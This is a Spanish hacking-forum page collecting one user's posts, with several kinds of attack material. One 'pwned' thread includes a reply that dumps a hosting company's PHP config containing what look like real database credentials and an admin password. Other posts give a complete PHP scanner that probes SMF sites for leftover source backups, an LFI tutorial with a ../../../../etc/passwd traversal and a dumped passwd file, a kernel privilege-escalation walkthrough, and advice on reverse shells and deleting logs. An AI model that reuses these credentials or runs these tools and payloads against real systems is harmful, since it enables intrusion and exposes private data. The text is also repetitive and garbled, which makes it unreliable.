Yo haría que se habrá en una pestaña nueva por comodidad.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#262
Dudas y pedidos generales / Re:Como se crea una pagina para que se vea en celulares :S
Noviembre 28, 2012, 02:40:25 AM
html5 media querys creo que es la solucion 
#263
Bugs y Exploits / Re:Remote FIle Inclusion para Novatos
Noviembre 26, 2012, 06:07:43 PM
Si no me equivoco el rfi esta obsoleto porque php 5.2.26 hace el control de las variables de manera interna.
#264
Bugs y Exploits / Re:SQLi Automatizado con SQLMAP
Octubre 24, 2012, 07:32:57 AMCita de: [Corruptedyte link=topic=11428.msg40819#msg40819 date=1349714884]Código: text Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.
bitch please estas exponiendo informacion privada y la url completa del sitio si vas a estar de blackhat no vengas justificandote despues, acepta responsabilidades y simplemente no te justifiques al final de post.
comparto la opinion, si quisieras hacer algo "etico" podrias con el tuto adjuntar un ejemplo de una aplicacion mal codeada a proposito, con las configuraciones que deben ser onda escenario "real". De onda el comentario
#265
Hacking ShowOff / Re:Remoteexecution.info Pwned!
Octubre 03, 2012, 01:24:47 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginEsa no es mi empresa men! Igual me acabo de poner a ver como defaceaste y la verdad que estuvo bueno, fue sencillo pero me confie en los sysadmines xDYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
el que a hierro mata, a hierro muere :3
Muy buen dicho.
Pues mira tu empresa
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginCódigo: text <?php
function titulo(){
echo "::ADMHost::";
}
function titulopanel(){
echo " ::. Panel ADMHost.::";
}
function conexion(){
global $conexion;
$conexion = mysql_connect("localhost","admahost_admhost","dellVShp");
mysql_select_db("admahost_admhost",$conexion) OR die ("error". mysql_errno());
mysql_query("SET NAMES 'utf8'");
if(!$conexion)
{
echo "Error en la conexion";
}
}
function conexionps(){
global $mysqli;
$mysqli = new mysqli("localhost","admahost_admhost","dellVShp", 'admahost_admhost');
if (mysqli_connect_errno())
{
echo "Error connect's Prepared Statements";
exit;
}
}Código: text information_schema
admahost_admhost
admahost_mails
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
usuario: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
pass: 123456
Saludos
Congrats!
#266
Hacking ShowOff / Re:Remoteexecution.info Pwned!
Octubre 03, 2012, 12:31:52 AM
el que a hierro mata, a hierro muere :3
#267
Hacking ShowOff / Re:Remoteexecution.info Pwned!
Octubre 03, 2012, 12:19:40 AM
re pwned 
gracias por dumpear la db, ni yo la tenia xD
gracias por dumpear la db, ni yo la tenia xD
#268
Bugs y Exploits / Re:Como hacer una BackConect By Okol
Septiembre 10, 2012, 05:14:51 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Con WeBacoo o Weevely, así el servidor tenga Firewall o no tenga el Netcat, de igual forma se puede obtener un Reverse Shell de manera mas rápida y avanzada.
Realmente este post es para principiantes.
No todos nacen sabiendo.
Ya es tiempo de actualizarse.
Quize decir que algunos, recien estan aprendiendo... y a lo mejor esto le sirva de mucho o tal vez no, pero siempre y cuando sea para aprender no esta de mas...
#269
Bugs y Exploits / Re:Como hacer una BackConect By Okol
Septiembre 10, 2012, 04:45:08 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Con WeBacoo o Weevely, así el servidor tenga Firewall o no tenga el Netcat, de igual forma se puede obtener un Reverse Shell de manera mas rápida y avanzada.
Realmente este post es para principiantes.
No todos nacen sabiendo.
#270
Bugs y Exploits / Re:Como hacer una BackConect By Okol
Septiembre 10, 2012, 02:09:13 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
pero hay que ser responsable y no ensñar a niños a cojer y no advirtirles de sida o embarazos x) yo se que no tienes etica pero es de esperarse de un defacer y no de un pentester;)
y para ocultar el ip es tan facil como un no-ip que para eso se ocupaba realmente antes en back connect y no para andar de lammerto crea botnets
Amen!
Por otro lado si quieren que no se les reconozca su ip, tunelizen y eliminen logs!
#271
Back-end / SMF Source Code Disclosure Seeker
Septiembre 02, 2011, 12:20:11 PM
Esta tool no se si sera muy util pero por las dudas me tome el tiempo de hacerla, mas que nada sirve para ver los archivos temporales que fueron creados cuando se instalan nuevos modulos en el sistema de smf. Les dejo el codigo.
Código: php
Ejemplo obtenido al correr el script.
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/BoardIndex.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Load.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManageBoards.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManagePermissions.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManagePosts.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManageRegistration.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManageSearch.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Modlog.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ModSettings.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/PersonalMessage.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Post.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Profile.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Recent.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Register.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Search.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Subs-Boards.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Subs-Graphics.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Subs-Members.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Subs.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Who.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Admin.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/BoardIndex.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Display.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/index.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/ManageBoards.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/ManageSearch.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Modlog.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/PersonalMessage.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Post.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Profile.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Register.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Search.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Errors.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Help.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Login.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Modifications.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Modifications.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/ModSettings.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Who.english.php~
<html>
<title>SMF Source Code Disclosure Seeker</title>
<style type="text/css">
body{
background: #000;
color: #FFF;
}
a:visited{
color:#FFF;
text-decoration: none;
}
a:link{
color:#FFF;
text-decoration: none;
}
a:hover{
color:#FF0000;
text-decoration: blink;
}
input,option{
font-family: verdana, sans-serif;
font-size: 16pt;
border: gray 2px solid;
}
#links{
margin:0 auto;
width:860px;
border-color: #E8E8E8;
text-align: right;
}
</style>
<body>
<div id="links">
<center>
<img src="http://www.0x3a.com.ar/img/logo.png"/><br/>
<form action ="" method="post">
URL : <input type ="text" name="site" size="50"/>
<input type = "submit" value="Test!" />
</form>
<?php
/**
*
*
* @author Daniel Godoy
* @copyright 2011
* @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*
**/
set_time_limit(0);
$site = $_POST['site'];
$list = array('index.php~', 'Settings.php~','Settings_bak.php~','/Sources/Admin.php~','/Sources/BoardIndex.php~','/Sources/Calendar.php~','/Sources/Display.php~',
'/Sources/Errors.php~','/Sources/DumpDatabase.php~','/Sources/Help.php~','/Sources/index.php~','/Sources/Karma.php~','/Sources/Load.php~',
'/Sources/LockTopic.php~','/Sources/LogInOut.php~','/Sources/ManageAttachments.php~','/Sources/ManageBans.php~','/Sources/ManageBoards.php~',
'/Sources/ManageCalendar.php~','/Sources/ManageErrors.php~','/Sources/ManageMembergroups.php~','/Sources/ManageMembers.php~',
'/Sources/ManageNews.php~','/Sources/ManagePermissions.php~','/Sources/ManagePosts.php~','/Sources/ManageRegistration.php~',
'/Sources/ManageSearch.php~','/Sources/ManageServer.php~','/Sources/ManageShoutbox.php~','/Sources/ManageSmileys.php~','/Sources/Memberlist.php~',
'/Sources/MessageIndex.php~','/Sources/Memberlist.php~','/Sources/MessageIndex.php~','/Sources/Modlog.php~','/Sources/ModSettings.php~',
'/Sources/MoveTopic.php~','/Sources/News.php~','/Sources/Notify.php~','/Sources/PackageGet.php~','/Sources/Packages.php~','/Sources/PersonalMessage.php~',
'/Sources/Poll.php~','/Sources/Post.php~','/Sources/Printpage.php~','/Sources/Profile.php~','/Sources/QueryString.php~','/Sources/Recent.php~',
'/Sources/Register.php~','/Sources/Reminder.php~','/Sources/RemoveTopic.php~','/Sources/RepairBoards.php~','/Sources/Reports.php~','/Sources/Search.php~',
'/Sources/Security.php~','/Sources/SendTopic.php~','/Sources/Shoutbox.php~','/Sources/SplitTopics.php~','/Sources/Stats.php~',
'/Sources/Subs-Auth.php~','/Sources/Subs-Boards.php~','/Sources/Subs-Charset.php~','/Sources/Subs-Compat.php~','/Sources/Subs-Graphics.php~',
'/Sources/Subs-Members.php~','/Sources/Subs-Package.php~','/Sources/Subs-Post.php~','/Sources/Subs-Shoutbox.php~','/Sources/Subs-Sound.php~',
'/Sources/Subs.php~','/Sources/Themes.php~','/Sources/ViewQuery.php~','/Sources/Who.php~','/Themes/default/Admin.template.php~',
'/Themes/default/BoardIndex.template.php~','/Themes/default/Calendar.template.php~','/Themes/default/Combat.template.php~',
'/Themes/default/Display.template.php~','/Themes/default/Errors.template.php~','/Themes/default/Help.template.php~','/Themes/default/index.php~',
'/Themes/default/index.template.php~','/Themes/default/Login.template.php~','/Themes/default/ManageAttachments.template.php~',
'/Themes/default/ManageBans.template.php~','/Themes/default/ManageBoards.template.php~','/Themes/default/ManageCalendar.template.php~',
'/Themes/default/ManageMembergroups.template.php~','/Themes/default/ManageMembers.template.php~','/Themes/default/ManageNews.template.php~',
'/Themes/default/ManagePermissions.template.php~','/Themes/default/ManageSearch.template.php~','/Themes/default/ManageShoutbox.template.php~',
'/Themes/default/ManageSmileys.template.php~','/Themes/default/Memberlist.template.php~','/Themes/default/MessageIndex.template.php~',
'/Themes/default/Modlog.template.php~','/Themes/default/MoveTopic.template.php~','/Themes/default/Notify.template.php~',
'/Themes/default/Packages.template.php~','/Themes/default/PersonalMessage.template.php~','/Themes/default/Poll.template.php~',
'/Themes/default/Post.template.php~','/Themes/default/Printpage.template.php~','/Themes/default/Profile.template.php~',
'/Themes/default/Recent.template.php~','/Themes/default/Register.template.php~','/Themes/default/Reminder.template.php~',
'/Themes/default/Reports.template.php~','/Themes/default/Search.template.php~','/Themes/default/SendTopic.template.php~','/Themes/default/Settings.template.php~',
'/Themes/default/Shoutbox.template.php~','/Themes/default/SplitTopics.template.php~','/Themes/default/Stats.template.php~',
'/Themes/default/Themes.template.php~','/Themes/default/Who.template.php~','/Themes/default/Wireless.template.php~','/Themes/default/Xml.template.php~',
'/Themes/default/languages/Admin.english.php~','/Themes/default/languages/Admin.spanish_latin.php~','/Themes/default/languages/Errors.english.php~',
'/Themes/default/languages/Errors.spanish_latin.php~','/Themes/default/languages/Help.english.php~','/Themes/default/languages/Help.spanish_latin.php~',
'/Themes/default/languages/index.english.php~','/Themes/default/languages/index.spanish_latin.php~','/Themes/default/languages/Install.english.php~',
'/Themes/default/languages/Install.spanish_latin.php~','/Themes/default/languages/Login.english.php~','/Themes/default/languages/Login.spanish_latin.php~',
'/Themes/default/languages/ManageBoards.english.php~','/Themes/default/languages/ManageBoards.spanish_latin.php~','/Themes/default/languages/ManageCalendar.english.php~',
'/Themes/default/languages/ManageCalendar.spanish_latin.php~','/Themes/default/languages/ManageMembers.english.php~','/Themes/default/languages/ManageMembers.spanish_latin.php~',
'/Themes/default/languages/ManagePermissions.english.php~','/Themes/default/languages/ManagePermissions.spanish_latin.php~','/Themes/default/languages/ManageSmileys.english.php~',
'/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~','/Themes/default/languages/Manual.spanish_latin.php~',
'/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~',
'/Themes/default/languages/Manual.spanish_latin.php~','/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/Modifications.spanish_latin.php~',
'/Themes/default/languages/ModSettings.english.php~','/Themes/default/languages/ModSettings.spanish_latin.php~','/Themes/default/languages/Packages.english.php~',
'/Themes/default/languages/Packages.spanish_latin.php~','/Themes/default/languages/PersonalMessage.english.php~','/Themes/default/languages/PersonalMessage.spanish_latin.php~',
'/Themes/default/languages/Post.english.php~','/Themes/default/languages/Post.spanish_latin.php~','/Themes/default/languages/Profile.english.php~',
'/Themes/default/languages/Profile.spanish_latin.php~','/Themes/default/languages/Reports.english.php~','/Themes/default/languages/Reports.spanish_latin.php~',
'/Themes/default/languages/Search.english.php~','/Themes/default/languages/Search.spanish_latin.php~','/Themes/default/languages/Settings.english.php~',
'/Themes/default/languages/Settings.spanish_latin.php~','/Themes/default/languages/Shoutbox.english.php~','/Themes/default/languages/Stats.english.php~',
'/Themes/default/languages/Stats.spanish_latin.php~','/Themes/default/languages/Themes.english.php~','/Themes/default/languages/Themes.spanish_latin.php~',
'/Themes/default/languages/Who.english.php~','/Themes/default/languages/Who.spanish_latin.php~','/Themes/default/languages/Wireless.english.php~',
'/Themes/default/languages/Wireless.spanish_latin.php~',
);
if(isset($site)){
foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
if (preg_match("/200 OK/", $result)){
flush();
echo '<br/>[!] <a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
ob_flush();
}
}
}
?>
</center>
</div>
</body>
</html>
Ejemplo obtenido al correr el script.
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/BoardIndex.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Load.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManageBoards.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManagePermissions.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManagePosts.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManageRegistration.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ManageSearch.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Modlog.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/ModSettings.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/PersonalMessage.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Post.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Profile.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Recent.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Register.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Search.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Subs-Boards.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Subs-Graphics.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Subs-Members.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Subs.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Sources/Who.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Admin.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/BoardIndex.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Display.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/index.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/ManageBoards.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/ManageSearch.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Modlog.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/PersonalMessage.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Post.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Profile.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Register.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/Search.template.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Errors.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Help.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Login.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Modifications.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Modifications.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/ModSettings.english.php~
[!] You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/Themes/default/languages/Who.english.php~
#272
Pentesting / Local File Inclusion
Agosto 27, 2011, 08:39:31 PM
Este paper lo escribí hace como 4 años mas o menos O_O
Es algo básico pero creo que se entiende el concepto bastante bien.
[LFI]Local File Inclusion
Es un exploit que permite incluir archivos locales, como por ejemplo /etc/passwd <--- es el que se utiliza para probar si se puede explotar el sitio es vulnerable a lfi. un ejemplo vulnerable a LFI seria.
Código: text
$_GET es el metodo que utilizamos para recoger los valores o variables introducidas por el usuario, y se veria algo asi
Código: text
el resultado seria algo asi You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
esto incluria lo que el usuario le indica... es decir el archivo existente en la pagina actual. ahora teniendo un poco de concomiento acerca de como se produce el lfi Vamos a probar si entendimos los conceptos. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login Esto debe incluir el archivo /etc/passwd en la página actual. El'../' significa subir un directorio. (seguro que si alguien uso dreamweaver le resultara familiar, a la hora de indicar donde se encuentra los archivos de la pagina) por lo general los directorios esta distribuidos de este modo "/home/nombredelhost/sitios/www.pagina.com/" y el archivo vulnerable (view.php)se encuentra en "/home/nombredelhost/sitios/www.pagina.com/file.php". como se imaginan /home/ es un directorio, /nombre del host/ es directorio, /sitios/ es directorio y /www.pagina.com/ tambien, lo que nos que hacer es ir al directorio raíz "/" en donde recine podremos tener acceso a /etc/Passwd Por lo tanto, en la url, para incluir el archivo /etc/passwd retrocedemos 4 directorios: ../../../../etc/passwd NOTA: si open_basedirrestriction estuviese desactivado este bug no funciona ya que solo permite incluir archivos ende su sitio y no del servidor.
Es algo básico pero creo que se entiende el concepto bastante bien.
[LFI]Local File Inclusion
Es un exploit que permite incluir archivos locales, como por ejemplo /etc/passwd <--- es el que se utiliza para probar si se puede explotar el sitio es vulnerable a lfi. un ejemplo vulnerable a LFI seria.
<?php
$page = $_GET['page'];
include($page);
?>
$_GET es el metodo que utilizamos para recoger los valores o variables introducidas por el usuario, y se veria algo asi
view.php?file=EntradaUsuarioel resultado seria algo asi You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
esto incluria lo que el usuario le indica... es decir el archivo existente en la pagina actual. ahora teniendo un poco de concomiento acerca de como se produce el lfi Vamos a probar si entendimos los conceptos. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login Esto debe incluir el archivo /etc/passwd en la página actual. El'../' significa subir un directorio. (seguro que si alguien uso dreamweaver le resultara familiar, a la hora de indicar donde se encuentra los archivos de la pagina) por lo general los directorios esta distribuidos de este modo "/home/nombredelhost/sitios/www.pagina.com/" y el archivo vulnerable (view.php)se encuentra en "/home/nombredelhost/sitios/www.pagina.com/file.php". como se imaginan /home/ es un directorio, /nombre del host/ es directorio, /sitios/ es directorio y /www.pagina.com/ tambien, lo que nos que hacer es ir al directorio raíz "/" en donde recine podremos tener acceso a /etc/Passwd Por lo tanto, en la url, para incluir el archivo /etc/passwd retrocedemos 4 directorios: ../../../../etc/passwd NOTA: si open_basedirrestriction estuviese desactivado este bug no funciona ya que solo permite incluir archivos ende su sitio y no del servidor.
- Ejemplo: You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Código: text
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
vcsa:x:69:69:virtual console memory
owner:/dev:/sbin/nologin nscd:x:28:28:NSCD
Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated
SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous
NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mysql:x:500:500::/home/mysql:/sbin/nologin
postgres:x:501:501::/home/postgres:/bin/bash
mailadm:x:502:502::/home/mailadm:/sbin/nologin
webmail:x:503:503::/home/webmail:/bin/bash
lu:x:504:504::/home/lu:/bin/bash
public:x:505:506::/home/www/publicpage:/bin/bash
stu:x:506:508::/home1/stu:/bin/bash
#273
Pentesting / Explotando sock_sendpage()
Agosto 27, 2011, 08:38:28 PM
Este fallo data de 8 años y nadie se había dado cuenta...
La vulnerabilidad aquí citada aprovecha fallos en los kernels que van desde la versión
2.4.4 hasta 2.4.37.4 y desde 2.6.0 a la 2.6.30.4 permitiendo elevar privilegios de usuario
normal a root...
El error que analizaremos en esta ocasión esta en la funcion sock_sendpage() que se encuentra
en net/socket.c y el problema particularmente se encuentra en la llamada a sendpage() que no
verifica si el puntero se ha inicializado.
Código: text
Código: text
Hemos visto que no se verifica si el puntero a sendpage() esta correctamente inicializado. Sera necesario ahora, encontrar situaciones en las que el puntero a la función sendpage() no se haya inicialiado.
Tavis Ormandy y Julien Tinnes (De el equipo de seguridad informatica de Google) en su investigación localizaron deficiencias en la incialización del puntero para la macro SOCKOPS_WRAP, definida en include/linux/net.h, que incluye PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25 y PF_AX25. Tambien encontraron deficiencias en otros protocolos como PF_BLUETOOTH, PF_IUCV, PF_INET6 (con IPPROTO_SCTP), PF_PPPOX y PF_ISDN.
Prestemos atencion al protocolo Bluetooth, ubicado en net/bluetooth/bnep/sock.c donde encontraremos la estructura bnet_sock_ops en la que no se inicializa sendpage con sock_no_sendpage(), en ese caso quedara apuntando a NULL.
Código: text
Veamos la macro SOCOPS_WRAP, casi no se nota el error pero prestemos atencion a la ultima linea.
Código: text
Bueno ahora que conocemos donde esta el error, veamos como aprovecharlo...
Para tal caso debemos contar con una funcion que podamos ejecutar en espacio de usuario
que use la funcion sock_sendpage(), existen muchas...la propuesta en este caso es sendfile().
Forzaremos el uso de sendpage() con la siguente secuencia:
Código: text
Cuando se ejecute la funcion sendpage(), si no esta inicializada y apuntando a NULL,
el kernel tratara de ejecutar las instrucciones que hay en la direccion 0, mapeando dicha
direccion y almacenando alli lo que queremos que ejecute el kernel podemos sacar provecho
de dicha vulnerabilidad.
De este modo cuando dicho kernel intente ejecutar sendpage() en realidad ejecutara nuestro codigo
en el espacio de kernel, asi podremos escalar privilegios, haciendo que el codigo almacenado en la
direccion 0 ponga nuestro uid a 0 (uid=0 privilegios de root ^^)
Espero que se haya entendido y ahora se comprenda a fondo de como se aprovecha este maravilloso fallo.
La vulnerabilidad aquí citada aprovecha fallos en los kernels que van desde la versión
2.4.4 hasta 2.4.37.4 y desde 2.6.0 a la 2.6.30.4 permitiendo elevar privilegios de usuario
normal a root...
El error que analizaremos en esta ocasión esta en la funcion sock_sendpage() que se encuentra
